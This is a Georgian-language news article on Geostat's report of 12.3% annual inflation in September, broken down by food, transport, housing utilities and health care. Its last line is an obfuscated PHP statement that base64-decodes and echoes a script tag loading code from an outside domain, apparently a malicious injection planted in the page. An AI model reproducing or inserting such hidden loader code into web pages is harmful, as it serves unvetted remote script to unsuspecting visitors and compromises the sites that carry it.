celsiusi
ავერსი შნაიდერი
საქსტატმა დღეს ინფლაციის ამსახველი ანგარიში გამოაქვეყნა. დოკუმენტის მიხედვით, სექტემბერში ქვეყანაში ფასები წლიურ ჭრილში 12.3%-ით გაიზარდა. ფასების ზრდა სამომხმარებლო საქონლის ყველა ჯგუფს შეეხო, მათ შორისაა სურსათი, ჯანდაცვა, ტრანსპორტი, კომუნალური ტარიფები და სხვა.
 
სურსათი და უალკოჰოლო სასმელები: ჯგუფში ფასები გაიზარდა 15.9 პროცენტით, რაც წლიურ ინფლაციაზე 4.99 პროცენტული პუნქტით აისახა. ფასები მომატებულია შემდეგ ქვეჯგუფებზე: ზეთი და ცხიმი (40.7 პროცენტი), ბოსტნეული და ბაღჩეული (38.2 პროცენტი), რძე, ყველი და კვერცხი (17.1 პროცენტი), შაქარი, ჯემი და სხვა ტკბილეული (16.6 პროცენტი), პური და პურპროდუქტები (13.2 პროცენტი), მინერალური და წყაროს წყალი, უალკოჰოლო სასმელები და ნატურალური წვენები (12.6 პროცენტი), თევზეული (11.5 პროცენტი), ხორცი და ხორცის პროდუქტები (10.4 პროცენტი), ყავა, ჩაი და კაკაო (7.1 პროცენტი);
 
ტრანსპორტის ჯგუფში ფასები გაიზარდა 20.3 პროცენტით, რაც 2.47 პროცენტული პუნქტით აისახა მთლიანი ინდექსის ზრდაზე. ფასები გაიზარდა პირადი სატრანსპორტო საშუალებების ექსპლუატაციაზე (29.3 პროცენტი) და სატრანსპორტო მომსახურებაზე (4.6 პროცენტი);
 
საცხოვრებელი, წყალი, ელ.ენერგია, აირი: ჯგუფში დაფიქსირდა ფასების 11.8 პროცენტიანი მატება, რაც 1.74 პროცენტული პუნქტით აისახა წლიურ ინფლაციაზე. ფასები გაიზარდა ქვეჯგუფებზე: ელექტროენერგია, აირი და სათბობის სხვა სახეები (14.6 პროცენტი), საცხოვრებლის მიმდინარე მოვლა და შეკეთება (7.1 პროცენტი), წყალმომარაგება და საცხოვრებელთან დაკავშირებული სხვა მომსახურება (4.5 პროცენტი);
 
ჯანმრთელობის დაცვა: ჯგუფში ფასები მომატებულია 9.2 პროცენტით. შესაბამისად, ჯგუფის წვლილმა წლიურ ინდექსში 0.72 პროცენტული პუნქტი შეადგინა. ფასები გაზრდილია სამედიცინო პროდუქციის, აპარატურის და მოწყობილობის (14.9 პროცენტი), საავადმყოფოების მომსახურების (5.3 პროცენტი) და ამბულატორიული სამედიცინო მომსახურების (3.4 პროცენტი) ქვეჯგუფებზე.
1240
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");